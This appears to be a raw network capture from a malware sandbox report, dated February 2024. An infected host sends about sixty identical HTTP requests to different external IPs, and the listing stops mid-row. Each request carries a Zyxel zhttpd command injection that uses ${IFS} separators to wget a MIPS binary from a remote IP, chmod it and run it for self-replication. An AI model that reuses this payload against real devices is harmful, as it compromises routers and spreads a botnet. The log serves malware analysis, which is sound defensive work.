                                                      3149192.168.2.1456178122.173.103.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.531996965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3150192.168.2.1444980213.191.182.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532059908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3151192.168.2.144292089.36.181.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532108068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3152192.168.2.1457012216.207.129.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532159090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3153192.168.2.1454948107.240.179.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532192945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3154192.168.2.1434774189.197.20.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532236099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3155192.168.2.1441624109.160.105.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532284975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3156192.168.2.1451792207.114.135.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532330990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3157192.168.2.146053814.7.34.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532365084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3158192.168.2.1460072198.31.26.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532423019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3159192.168.2.1441192184.198.173.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532466888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3160192.168.2.1455420207.133.255.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532504082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3161192.168.2.1436724141.78.254.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532530069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3162192.168.2.144227639.26.160.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532587051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3163192.168.2.1441570213.155.90.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532630920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3164192.168.2.145262453.20.105.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532685041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3165192.168.2.145428837.237.167.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532725096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3166192.168.2.1435222114.252.72.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532751083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3167192.168.2.1454166141.223.220.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532783031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3168192.168.2.143520247.87.211.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532830954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3169192.168.2.1444940172.177.251.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532865047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3170192.168.2.145332645.104.114.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532922029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3171192.168.2.144534263.245.189.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532934904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3172192.168.2.1460044145.198.245.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.532974005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3173192.168.2.14571925.30.86.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533021927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3174192.168.2.145886298.163.178.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533050060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3175192.168.2.1441028142.124.240.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533092976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3176192.168.2.1444146207.76.200.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533138037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3177192.168.2.145746667.74.51.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533164978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3178192.168.2.1451794177.215.226.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533219099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3179192.168.2.145974682.74.66.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533250093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3180192.168.2.1448934187.245.108.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533282042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3181192.168.2.143367275.36.104.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533308029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3182192.168.2.1448014144.161.23.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533354044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3183192.168.2.1446812144.163.112.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533399105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3184192.168.2.1434340178.92.127.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533431053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3185192.168.2.1454952207.138.71.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533462048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3186192.168.2.1452132180.157.157.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533488035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3187192.168.2.14532245.111.190.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533545971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3188192.168.2.144546452.245.199.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533577919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3189192.168.2.143412491.71.103.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533615112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3190192.168.2.14429029.106.127.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533649921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3191192.168.2.1435486205.117.115.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533687115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3192192.168.2.145164658.173.95.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533709049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3193192.168.2.144369036.0.22.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533770084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3194192.168.2.144180249.15.210.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533792019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3195192.168.2.1456750116.225.122.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533832073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3196192.168.2.1444378201.112.93.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533884048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3197192.168.2.1448338178.155.4.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533935070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3198192.168.2.1444122168.100.78.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.533973932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3199192.168.2.144919635.149.136.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534085989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3200192.168.2.1440990103.169.118.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534137964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3201192.168.2.1449514211.98.0.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534167051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3202192.168.2.144797465.232.217.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534195900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3203192.168.2.1456794203.60.235.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534251928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3204192.168.2.1451056209.135.104.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534282923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3205192.168.2.1453484190.194.222.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534328938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3206192.168.2.1444626141.4.217.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534368992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3207192.168.2.1436418106.129.247.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534409046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3208192.168.2.143912051.106.232.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534444094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3209192.168.2.145524823.206.81.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534472942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3210192.168.2.143847438.201.40.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534511089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3211192.168.2.1455974154.138.79.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534548998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3212192.168.2.1458094176.29.62.233443
